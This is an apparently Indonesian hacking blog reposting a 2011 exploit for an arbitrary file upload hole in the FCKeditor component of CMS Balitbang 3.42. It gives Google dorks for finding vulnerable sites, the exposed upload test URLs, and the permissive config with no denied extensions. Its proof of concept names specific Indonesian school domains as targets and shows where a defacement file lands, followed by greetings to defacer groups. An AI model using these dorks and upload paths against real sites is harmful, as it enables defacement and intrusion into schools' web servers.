Search
logo blog
Selamat Datang Di Blog Kompi Males
Terima kasih atas kunjungan Anda di blog Kompi Males,
semoga apa yang saya share di sini bisa bermanfaat dan memberikan motivasi pada kita semua
untuk terus berkarya dan berbuat sesuatu yang bisa berguna untuk orang banyak.
CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit

CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit

on EXPLOIT, WEB HACKING On 01.01 with No comments

Title Exploited  : CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit
Author Exploit  : the_cyber_nuxbie
Time & Date    : 2011-04-26
============================================================================================================ 
| CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit |

#[~] Author : the_cyber_nuxbie
#[~] Home   : www.thecybernuxbie.com
#[~] E-mail : nuxbie@sekuritionline.net
#[~] Found  : 06 April 2011.
#[~] Version: CMS Balitbang 3.42.
#[~] Tested : Windows 7 Ultimate 32bit.
#[~] Link   : http://www.kajianwebsite.org/download/cms-balitbang.rar
#[!] Dork   : inurl:"/html/siswa.php?"
              inurl:"/html/alumni.php?"
              inurl:"/html/guru.php?"
______________________________________________________________

#[~] Exploited:

http://public_html/dir/editor/filemanager/connectors/uploadtest.html

http://public_html/dir/editor/filemanager/connectors/test.html

http://public_html/dir/editor/filemanager/browser/default/browser.html

#[~] Directory:

http://public_html/userfiles/file/file-deface.txt

Setting:
"editor/filemanager/connectors/php/config.php"

$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
$Config['DeniedExtensions']['File']  = array() ;
$Config['FileTypesPath']['File']  = $Config['UserFilesPath'] . 'file/' ;
$Config['FileTypesAbsolutePath']['File']= ($Config['UserFilesAbsolutePath'] == '') ? '' : $Config['UserFilesAbsolutePath'].'file/' ;
$Config['QuickUploadPath']['File']  = $Config['UserFilesPath'] ;
$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;

- P.o.C:
1. Target:
Special Site:.sch.id (indonesian).

http://www.sma-magelang.sch.id

http://www.smp-banjar.sch.id

http://www.sma3-pesantren.sch.id

2. http://www.sma-magelang.sch.id/editor/filemanager/connectors/test.html

http://www.sma-magelang.sch.id/editor/filemanager/connectors/uploadtest.html

3. Find Your Files:

http://www.sma-magelang.sch.id/userfiles/file/h4ck3d.txt

- Greetz:
All Member YogyaFamilyCode.
All Member IndonesianDefacer.
All Member IndonesianCoder.
All Member MagelangCyber.
All Member Devilzc0de.
All Member Hacker-Newbie.
All Member Jatim-Crew.
All Member Fast-Hacker

- April 7 2011, GMT +07:00 Solo Raya, Indonesia.
============================================================================================================
Send all submissions to: nuxbie[at]sekuritionline[dot]net
Copyright © 2011, TheCyberNuxbie, Solo, Jawa Tengah, Indonesian.
Enter your email address to get update from Kompi Ajaib.
Print PDF
Next
« Prev Post Previous
Next Post »

Copyright © 2013. INFORMASI INTERNET - All Rights Reserved | Template Created by Kompi Ajaib Proudly powered by Blogger